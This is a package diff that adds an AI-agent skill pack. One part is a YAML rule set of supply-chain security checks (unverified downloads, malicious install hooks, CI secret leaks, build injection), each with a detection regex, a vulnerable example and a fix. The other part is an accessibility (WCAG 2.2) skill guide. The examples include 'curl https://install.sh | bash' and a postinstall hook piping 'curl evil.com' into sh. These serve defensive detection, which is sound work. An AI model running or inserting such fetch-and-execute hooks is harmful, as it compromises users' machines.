+ name: Missing Lockfile
52
+ severity: HIGH
53
+ category: Build
54
+ description: No package lockfile to ensure reproducible builds
55
+ detection_pattern: package\\.json(?!.*lock)
56
+ fix_pattern: "Always commit lockfile: package-lock.json yarn.lock"
57
+ slsa_level: "2"
58
+ example_vuln: // No lockfile committed
59
+ example_fix: .gitignore should NOT contain:\n# package-lock.json
60
+ - id: SC-05
61
+ name: Unverified Downloads
62
+ severity: HIGH
63
+ category: Build
64
+ description: Build scripts download dependencies without verification
65
+ detection_pattern: (curl|wget|fetch).*\\|.*sh(?!.*verify|checksum)
66
+ fix_pattern: Verify checksums signatures before executing
67
+ slsa_level: "2"
68
+ example_vuln: curl https://install.sh | bash
69
+ example_fix: curl -O script.sh\nsha256sum -c script.sh.sha256\nbash script.sh
70
+ - id: SC-06
71
+ name: No SBOM Generation
72
+ severity: MEDIUM
73
+ category: Compliance
74
+ description: Software Bill of Materials not generated - EU CRA 2024
75
+ detection_pattern: (build|release)(?!.*sbom|cyclonedx|spdx)
76
+ fix_pattern: Generate SBOM in CycloneDX or SPDX format
77
+ slsa_level: "3"
78
+ example_vuln: // No SBOM in build pipeline
79
+ example_fix: npm run build\nnpx @cyclonedx/cyclonedx-npm --output sbom.json
80
+ - id: SC-07
81
+ name: SBOM Not Signed
82
+ severity: MEDIUM
83
+ category: Compliance
84
+ description: SBOM exists but not cryptographically signed
85
+ detection_pattern: (sbom|bom)(?!.*sign|gpg|sigstore)
86
+ fix_pattern: Sign SBOM with Sigstore or GPG for integrity
87
+ slsa_level: "3"
88
+ example_vuln: // Unsigned SBOM generated
89
+ example_fix: cosign sign-blob sbom.json --bundle sbom.bundle
90
+ - id: SC-08
91
+ name: No SLSA Build
92
+ severity: HIGH
93
+ category: Build
94
+ description: Build process does not meet SLSA L1 requirements
95
+ detection_pattern: (build|ci)(?!.*slsa|provenance)
96
+ fix_pattern: Implement SLSA provenance generation in CI
97
+ slsa_level: "2"
98
+ example_vuln: // No build provenance
99
+ example_fix: '# GitHub Actions with SLSA generator\nuses: slsa-framework/slsa-github-generator@v1'
100
+ - id: SC-09
101
+ name: Vulnerable Transitive Deps
102
+ severity: HIGH
103
+ category: Dependencies
104
+ description: Transitive dependencies with known vulnerabilities
105
+ detection_pattern: (node_modules|vendor).*CVE(?!.*patched)
106
+ fix_pattern: Audit transitive deps use tools like Snyk or Trivy
107
+ slsa_level: "2"
108
+ example_vuln: // npm audit shows high vulns
109
+ example_fix: npm audit fix --force\n# Or override in package.json
110
+ - id: SC-10
111
+ name: Compromised Maintainer
112
+ severity: HIGH
113
+ category: Trust
114
+ description: Dependencies from accounts with weak security
115
+ detection_pattern: (npm\\.pkg|pypi\\.org)(?!.*2fa|verified)
116
+ fix_pattern: Prefer packages from verified organizations orgs
117
+ slsa_level: "1"
118
+ example_vuln: // Install from unverified author
119
+ example_fix: // Use verified org packages\n// Check maintainer 2FA status
120
+ - id: SC-11
121
+ name: Build Script Injection
122
+ severity: CRITICAL
123
+ category: Build
124
+ description: User input used in build scripts without sanitization
125
+ detection_pattern: (npm run|make|script).*\\$\\{?\\w+
126
+ fix_pattern: Sanitize all inputs used in build scripts
127
+ slsa_level: "3"
128
+ example_vuln: npm run build --version=${USER_INPUT}
129
+ example_fix: const version = sanitize(process.env.VERSION)
130
+ - id: SC-12
131
+ name: Missing Code Review
132
+ severity: HIGH
133
+ category: Process
134
+ description: Commits merged without required code review
135
+ detection_pattern: (merge|push)(?!.*review|approve)
136
+ fix_pattern: Require code review for all changes enable branch protection
137
+ slsa_level: "3"
138
+ example_vuln: // Direct push to main allowed
139
+ example_fix: '# Branch protection:\nRequire pull request reviews: 2'
140
+ - id: SC-13
141
+ name: No Signed Commits
142
+ severity: MEDIUM
143
+ category: Process
144
+ description: Commits not cryptographically signed
145
+ detection_pattern: git commit(?!.*-S|gpg)
146
+ fix_pattern: Require signed commits for all contributors
147
+ slsa_level: "2"
148
+ example_vuln: git commit -m 'feature'
149
+ example_fix: 'git commit -S -m ''feature''\n# Configure: git config commit.gpgsign true'
150
+ - id: SC-14
151
+ name: Insecure CI Secrets
152
+ severity: CRITICAL
153
+ category: CI/CD
154
+ description: CI secrets exposed in logs or accessible to forks
155
+ detection_pattern: (echo.*\\$SECRET|print.*API_KEY|secrets.*fork)
156
+ fix_pattern: Use proper secret management mask from logs
157
+ slsa_level: "3"
158
+ example_vuln: "echo $API_KEY # Leaked in logs"
159
+ example_fix: '# Use GitHub secrets with mask\necho ''***'' instead of actual secret'
160
+ - id: SC-15
161
+ name: CI Supply Chain Attack
162
+ severity: CRITICAL
163
+ category: CI/CD
164
+ description: CI actions or plugins from untrusted sources
165
+ detection_pattern: uses:\\s*[^@]+@(?!v\\d|sha:|main)
166
+ fix_pattern: Pin CI actions to specific commits or versions
167
+ slsa_level: "3"
168
+ example_vuln: "uses: random-user/action@main"
169
+ example_fix: 'uses: actions/checkout@v4.1.0\n# Or pin to SHA:\nuses: actions/checkout@abc1234'
170
+ - id: SC-16
171
+ name: No Reproducible Builds
172
+ severity: MEDIUM
173
+ category: Build
174
+ description: Build output varies between identical inputs
175
+ detection_pattern: (build|compile)(?!.*reproducible|deterministic)
176
+ fix_pattern: Enable reproducible builds verify output hashes
177
+ slsa_level: "3"
178
+ example_vuln: // Non-deterministic builds
179
+ example_fix: '# Enable reproducible builds\nSOURCE_DATE_EPOCH=0 npm run build'
180
+ - id: SC-17
181
+ name: Package Integrity Missing
182
+ severity: HIGH
183
+ category: Registry
184
+ description: Package checksums not verified during install
185
+ detection_pattern: (npm install|pip install|go get)(?!.*integrity|checksum)
186
+ fix_pattern: Enable package integrity checking in package manager
187
+ slsa_level: "2"
188
+ example_vuln: npm install --ignore-scripts
189
+ example_fix: npm install --integrity\n# package-lock.json contains integrity hashes
190
+ - id: SC-18
191
+ name: Dependency Update Lag
192
+ severity: MEDIUM
193
+ category: Maintenance
194
+ description: Dependencies significantly behind latest versions
195
+ detection_pattern: (outdated|deprecated).*\\d+\\sversions
196
+ fix_pattern: Implement automated dependency updates with testing
197
+ slsa_level: "1"
198
+ example_vuln: // 50+ outdated packages
199
+ example_fix: '# Dependabot or Renovate config\nupdateNotScheduled: weekly'
200
+ - id: SC-19
201
+ name: No Provenance Attestation
202
+ severity: HIGH
203
+ category: Trust
204
+ description: Published packages lack SLSA provenance attestation
205
+ detection_pattern: (npm publish|cargo publish)(?!.*provenance|attest)
206
+ fix_pattern: Generate and publish provenance with releases
207
+ slsa_level: "3"
208
+ example_vuln: npm publish
209
+ example_fix: npm publish --provenance\n# Requires npm 9.5+ and GitHub Actions
210
+ - id: SC-20
211
+ name: Malicious Script Hooks
212
+ severity: CRITICAL
213
+ category: Package
214
+ description: Dangerous commands in package script hooks
215
+ detection_pattern: (preinstall|postinstall).*\\b(rm|curl|wget|eval)\\b
216
+ fix_pattern: Review all install scripts audit before installing
217
+ slsa_level: "2"
218
+ example_vuln: '\postinstall\": \"curl evil.com | sh\""'
219
+ example_fix: // Only use trusted packages\n// Review postinstall scripts
package/.agent/skills/cross-cutting/_index.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  # cross-cutting/_index.yaml — Cross-cutting Skills Index
2
2
  category: cross-cutting
3
3
  description: "Cross-cutting concerns and utilities"
4
- count: 10
4
+ count: 12
5
5
  skills:
6
6
  - { id: testing, has_advanced: true }
7
7
  - { id: database, has_advanced: true }
@@ -9,7 +9,9 @@ skills:
9
9
  - { id: tailwind, has_advanced: false }
10
10
  - { id: electron, has_advanced: false }
11
11
  - { id: coding-rules, has_advanced: true }
12
- - { id: ui-ux-pro-max, has_advanced: true }
12
+ - { id: domyh-design, has_advanced: true }
13
13
  - { id: web-perf, has_advanced: false }
14
14
  - { id: deno, has_advanced: false }
15
15
  - { id: bun, has_advanced: false }
16
+ - { id: audit-pro, has_advanced: true }
17
+ - { id: playwright, has_advanced: true }
package/.agent/skills/cross-cutting/accessibility/META.yaml ADDED
@@ -0,0 +1,45 @@
1
+ name: accessibility
2
+ version: "6.2.1"
3
+ display: Accessibility (WCAG 2.2)
4
+ category: cross-cutting
5
+ tier: 1
6
+ priority: 1
7
+
8
+ desc: "WCAG 2.2 AA/AAA compliance, ARIA patterns, screen reader optimization, keyboard navigation, color contrast, focus management. Automated testing tools. 100+ patterns."
9
+
10
+ triggers:
11
+ file_patterns: []
12
+ keywords:
13
+ - accessibility
14
+ - a11y
15
+ - wcag
16
+ - aria
17
+ - screen reader
18
+ - keyboard navigation
19
+ - focus management
20
+ - color contrast
21
+ - alt text
22
+ - semantic html
23
+ - assistive technology
24
+ intents:
25
+ - make accessible
26
+ - WCAG compliance
27
+ - screen reader support
28
+ - accessibility audit
29
+
30
+ caps:
31
+ - WCAG 2.2 AA/AAA guidelines
32
+ - ARIA roles, states, properties
33
+ - Semantic HTML patterns
34
+ - Keyboard navigation
35
+ - Focus management
36
+ - Color contrast (4.5:1 / 7:1)
37
+ - Screen reader optimization
38
+ - Automated testing (axe, Lighthouse)
39
+ - Touch target sizing (44x44px)
40
+ - Reduced motion support
41
+
42
+ data_files:
43
+ - data/wcag-guidelines.yaml
44
+ - data/aria-patterns.yaml
45
+ - data/testing-tools.yaml
package/.agent/skills/cross-cutting/accessibility/SKILL.md ADDED
@@ -0,0 +1,121 @@
1
+ # Accessibility (WCAG 2.2)
2
+
3
+ > ♿ **Build inclusive web experiences for all users**
4
+ > **Guidelines**: WCAG 2.2 AA/AAA | **Patterns**: 100+ | **Tools**: 5+
5
+
6
+ ---
7
+
8
+ ## Quick Reference
9
+
10
+ | What You Need | Data File | Patterns |
11
+ | ------------------------------ | ---------------------- | -------- |
12
+ | WCAG 2.2 guidelines (POUR) | `wcag-guidelines.yaml` | 45 |
13
+ | ARIA roles, states, properties | `aria-patterns.yaml` | 35 |
14
+ | Testing tools and automation | `testing-tools.yaml` | 20 |
15
+
16
+ ---
17
+
18
+ ## POUR Principles
19
+
20
+ | Principle | Meaning | Key Guidelines |
21
+ | ------------------ | -------------------------- | ------------------------------- |
22
+ | **P**erceivable | Users can perceive content | Alt text, captions, contrast |
23
+ | **O**perable | Users can interact | Keyboard, timing, seizures |
24
+ | **U**nderstandable | Users can comprehend | Readable, predictable, errors |
25
+ | **R**obust | Works with assistive tech | Valid HTML, ARIA, compatibility |
26
+
27
+ ---
28
+
29
+ ## Essential Checklist
30
+
31
+ | Check | Requirement | Level |
32
+ | ------------------------------ | ---------------------------- | ----- |
33
+ | ✅ Alt text on images | Descriptive, skip decorative | A |
34
+ | ✅ Color contrast 4.5:1 (text) | Regular text | AA |
35
+ | ✅ Color contrast 7:1 (text) | Enhanced | AAA |
36
+ | ✅ Color contrast 3:1 (UI) | Borders, icons | AA |
37
+ | ✅ Keyboard navigation | All interactive elements | A |
38
+ | ✅ Focus visible indicator | 2px+ outline | AA |
39
+ | ✅ Touch target 24x24px | Minimum touch size | AA |
40
+ | ✅ Touch target 44x44px | Recommended | AAA |
41
+ | ✅ Skip navigation link | Skip to main content | A |
42
+ | ✅ Heading hierarchy | h1 → h2 → h3 (no skips) | A |
43
+ | ✅ Form labels | Every input has label | A |
44
+ | ✅ Error identification | Clear error messages | A |
45
+ | ✅ Reduced motion | `prefers-reduced-motion` | AA |
46
+ | ✅ Language attribute | `<html lang="en">` | A |
47
+
48
+ ---
49
+
50
+ ## ARIA Quick Reference
51
+
52
+ | Widget | Role | Required Properties |
53
+ | --------- | ------------------------ | ---------------------------------------- |
54
+ | Modal | `dialog` | `aria-modal`, `aria-labelledby` |
55
+ | Tab | `tab, tablist, tabpanel` | `aria-selected`, `aria-controls` |
56
+ | Accordion | `button` + region | `aria-expanded`, `aria-controls` |
57
+ | Menu | `menu, menuitem` | `aria-haspopup`, `aria-expanded` |
58
+ | Toast | `alert` or `status` | `role="alert"` (assertive) |
59
+ | Dropdown | `combobox, listbox` | `aria-expanded`, `aria-activedescendant` |
60
+
61
+ ### ARIA Rules
62
+
63
+ 1. **Don't use ARIA if native HTML works** — `<button>` not `<div role="button">`
64
+ 2. **Don't change native semantics** — `<h2 role="tab">` is wrong
65
+ 3. **All interactive ARIA must be keyboard accessible**
66
+ 4. **Don't use `role="presentation"` on focusable elements**
67
+ 5. **All ARIA states must be updated** — `aria-expanded`, `aria-pressed`
68
+
69
+ ---
70
+
71
+ ## Color Contrast
72
+
73
+ | Ratio | Text Type | Level |
74
+ | --------- | -------------------------------- | ----- |
75
+ | **4.5:1** | Normal text (< 18pt) | AA |
76
+ | **3:1** | Large text (≥ 18pt or 14pt bold) | AA |
77
+ | **7:1** | Normal text | AAA |
78
+ | **4.5:1** | Large text | AAA |
79
+ | **3:1** | UI components, graphics | AA |
80
+
81
+ ```css
82
+ /* High contrast focus styles */
83
+ :focus-visible {
84
+ outline: 3px solid #005fcc;
85
+ outline-offset: 2px;
86
+ }
87
+
88
+ /* Reduced motion */
89
+ @media (prefers-reduced-motion: reduce) {
90
+ *,
91
+ *::before,
92
+ *::after {
93
+ animation-duration: 0.01ms !important;
94
+ transition-duration: 0.01ms !important;
95
+ }
96
+ }
97
+ ```
98
+
99
+ ---
100
+
101
+ ## Testing Tools
102
+
103
+ | Tool | Type | Usage |
104
+ | ------------------ | ----------------- | ------------------------------- |
105
+ | **axe-core** | Automated | `npm install @axe-core/cli` |
106
+ | **Lighthouse** | Automated | Chrome DevTools → Accessibility |
107
+ | **WAVE** | Browser extension | Visual overlay of issues |
108
+ | **pa11y** | CI/CD | `npx pa11y https://example.com` |
109
+ | **NVDA/VoiceOver** | Manual | Screen reader testing |
110
+
111
+ ---
112
+
113
+ ## HSA Integration
114
+
115
+ Data powered by HSA BM25 search engine. Query YAML data via skill search:
116
+
117
+ | Domain | Query Examples |
118
+ | ------- | ---------------------------------- |
119
+ | WCAG | "contrast ratio text large font" |
120
+ | ARIA | "dialog modal focus trap keyboard" |
121
+ | Testing | "axe lighthouse automated CI" |